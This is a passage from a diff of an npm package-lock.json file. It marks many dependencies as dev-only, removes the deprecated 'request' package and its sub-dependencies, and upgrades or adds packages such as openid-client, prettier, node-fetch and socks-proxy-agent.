"sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true }, "micromatch": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, "requires": { "braces": "^3.0.3", "picomatch": "^2.3.1" @@ -6298,112 +6714,77 @@ "mimic-fn": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==" + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true - }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", "dev": true, "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } + "brace-expansion": "^1.1.7" } }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "dev": true - }, "ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "natural-compare": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==" + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", + "dev": true + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": "sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "dev": true, + "requires": { + "whatwg-url": "^5.0.0" + } }, "node-int64": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==" + "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", + "dev": true }, "node-releases": { "version": "2.0.18", "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==" + "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", + "dev": true }, "normalize-path": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==" + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true }, "npm-run-path": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dev": true, "requires": { "path-key": "^3.0.0" } }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", + "oauth4webapi": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.5.3.tgz", + "integrity": "sha512-2bnHosmBLAQpXNBLOvaJMyMkr4Yya5ohE5Q9jqyxiN+aa7GFCzvDN1RRRMrp0NkfqRR2MTaQNkcSUCCjILD9oQ==", "dev": true }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "dev": true, - "optional": true - }, - "oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "dev": true, - "optional": true - }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, "requires": { "wrappy": "1" } @@ -6412,46 +6793,26 @@ "version": "5.1.2", "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dev": true, "requires": { "mimic-fn": "^2.1.0" } }, "openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", + "version": "6.6.1", + "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.6.1.tgz", + "integrity": "sha512-GmqoICGMI3IyFFjhvXxad8of4QWk2D0tm4vdJkldGm9nw7J3p1f7LPLWgGeFuKuw8HjDVe8Dd8QLGBe0NFvSSg==", "dev": true, - "optional": true, "requires": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "optional": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true, - "optional": true - } + "jose": "^6.0.11", + "oauth4webapi": "^3.5.3" } }, "p-limit": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, "requires": { "yocto-queue": "^0.1.0" } @@ -6460,6 +6821,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, "requires": { "p-limit": "^2.2.0" }, @@ -6468,6 +6830,7 @@ "version": "2.3.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, "requires": { "p-try": "^2.0.0" } @@ -6477,12 +6840,14 @@ "p-try": { "version": "2.2.0", "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==" + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "dev": true }, "parse-json": { "version": "5.2.0", "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, "requires": { "@babel/code-frame": "^7.0.0", "error-ex": "^1.3.1", @@ -6493,62 +6858,65 @@ "path-exists": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==" + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" + "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true }, "path-key": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true }, "path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", "dev": true }, "picocolors": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==" + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dev": true }, "picomatch": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==" + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "dev": true }, "pirates": { "version": "4.0.6", "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==" + "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true }, "pkg-dir": { "version": "4.2.0", "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, "requires": { "find-up": "^4.0.0" } }, "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.6.0.tgz", + "integrity": "sha512-ujSB9uXHJKzM/2GBuE0hBOUgC77CN3Bnpqa+g80bkv3T3A93wL/xlzDATHhnhkzifz/UE2SNOvmbTz5hSkDlHw==", "dev": true }, "pretty-format": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", + "dev": true, "requires": { "@jest/schemas": "^29.6.3", "ansi-styles": "^5.0.0", @@ -6558,7 +6926,8 @@ "ansi-styles": { "version": "5.2.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==" + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true } } }, @@ -6566,89 +6935,45 @@ "version": "2.4.2", "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, "requires": { "kleur": "^3.0.3", "sisteransi": "^1.0.5" } }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==", - "dev": true - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "dev": true + "pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "dev": true, + "requires": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } }, "pure-rand": { "version": "6.1.0", "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==" - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", "dev": true }, "react-is": { "version": "18.2.0", "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==" - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "dev": true, - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } + "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", + "dev": true }, "require-directory": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==" + "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", + "dev": true }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dev": true, "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", @@ -6659,6 +6984,7 @@ "version": "3.0.0", "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, "requires": { "resolve-from": "^5.0.0" } @@ -6666,12 +6992,14 @@ "resolve-from": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==" + "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "dev": true }, "resolve.exports": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==" + "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", + "dev": true }, "rfc4648": { "version": "1.5.2", @@ -6679,27 +7007,17 @@ "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==", "dev": true }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "dev": true - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, "semver": { "version": "6.3.1", "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true }, "shebang-command": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, "requires": { "shebang-regex": "^3.0.0" } @@ -6707,32 +7025,65 @@ "shebang-regex": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true }, "signal-exit": { "version": "3.0.7", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true }, "sisteransi": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==" + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true }, "slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==" + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true + }, + "smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "dev": true + }, + "socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "dev": true, + "requires": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + } + }, + "socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, + "requires": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + } }, "source-map": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": 